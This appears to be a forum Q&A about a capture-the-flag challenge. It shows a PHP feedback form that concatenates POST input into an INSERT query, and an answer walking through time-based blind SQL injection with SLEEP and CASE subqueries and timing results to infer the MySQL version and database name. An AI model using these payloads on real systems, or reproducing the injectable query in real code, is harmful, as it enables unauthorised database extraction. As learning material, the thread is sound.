I have simple web application that allows to post a message to a MySQL database. My challenge is to get all the information about that Database. Unfortunately there's no output so I have to do a time-based blind injection.
This payload works and the response takes 5 seconds to reach the client.
' RLIKE SLEEP(5) AND '1'='1
I have to somehow replace the '1'='1 so I can check for table names or users.
Any idea??
Following is the code with the vulnerable query.
<?php
if (isset($_POST['feedback'])) {
$id = $_POST['feedback'];
$query = "INSERT INTO `hackdb`.`feedback` (`id` ,`feedback`, `feedback_read`, `created` ,`receiver`) VALUES (NULL,'".$_POST['feedback']."', '0', CURRENT_TIMESTAMP, '17')";
if ($result = $mysqli->query($query)) {
//echo "Done";
} else {
//echo $mysqli->error;
}
echo "Thank you for your feedback! We'll contact you later.";
} else {
echo "";
}
?>
(Disclaimer: This is a challenge and I'm working on a private server inside a VM. Nothing unethical is going on here)
Looking into your code only the field feedback is vulnerable to timebased blind SQL injection vectors.
Create database/create table
CREATE DATABASE IF NOT EXISTS hackdb;
CREATE TABLE IF NOT EXISTS feedback (
feedback VARCHAR(255)
);
You can inject using (SELECT ...) into feedback column because this is valid SQL.
Query
INSERT INTO
hackdb.feedback
(feedback)
VALUES (
(SELECT 1)
)
Result
1 row(s) affected
Execution Time : 0.013 sec
Transfer Time : 0 sec
Total Time : 0.014 sec
Test the timebased blind SQL injection vector.
Query
INSERT INTO
hackdb.feedback
(feedback)
VALUES (
(SELECT SLEEP(5))
)
Result
1 row(s) affected
Execution Time : 5.717 sec
Transfer Time : 0 sec
Total Time : 5.718 sec
And we are good to go.
Let's find out the database version.
We can use MySQL's VERSION() function for that
Query
INSERT INTO
hackdb.feedback
(feedback)
VALUES (
(SELECT
CASE
WHEN VERSION() LIKE '5.1%'
THEN SLEEP(5)
ELSE 0
END
FROM
DUAL
)
)
Result
1 row(s) affected
Execution Time : 0.014 sec
Transfer Time : 0 sec
Total Time : 0.014 sec
No bingo
Query
INSERT INTO
hackdb.feedback
(feedback)
VALUES (
(SELECT
CASE
WHEN VERSION() LIKE '5.7%'
THEN SLEEP(5)
ELSE 0
END
FROM
DUAL
)
)
Result
1 row(s) affected
Execution Time : 5.733 sec
Transfer Time : 0 sec
Total Time : 5.734 sec
Bingo.
Now we are going to find the database in use. We can use MySQL's DATABASE() function for that.
Query
INSERT INTO
hackdb.feedback
(feedback)
VALUES (
(SELECT
CASE
WHEN (SELECT 1 FROM DUAL WHERE DATABASE() LIKE 's%')
THEN SLEEP(5)
ELSE 0
END
FROM
DUAL
)
)
Result
1 row(s) affected
Execution Time : 0.014 sec
Transfer Time : 0 sec
Total Time : 0.015 sec
No bingo
Query
INSERT INTO
hackdb.feedback
(feedback)
VALUES (
(SELECT
CASE
WHEN (SELECT 1 FROM DUAL WHERE DATABASE() LIKE 'h%')
THEN SLEEP(5)
ELSE 0
END
FROM
DUAL
)
)
Result
1 row(s) affected
Execution Time : 5.715 sec
Transfer Time : 0 sec
Total Time : 5.716 sec
Bingo
Now you can add a second char into the LIKE part and so on.
I have given you some basic timebased blind SQL injection vectors.
It's up to you to find the tables in the database
I don't want to spoil your complete challenge.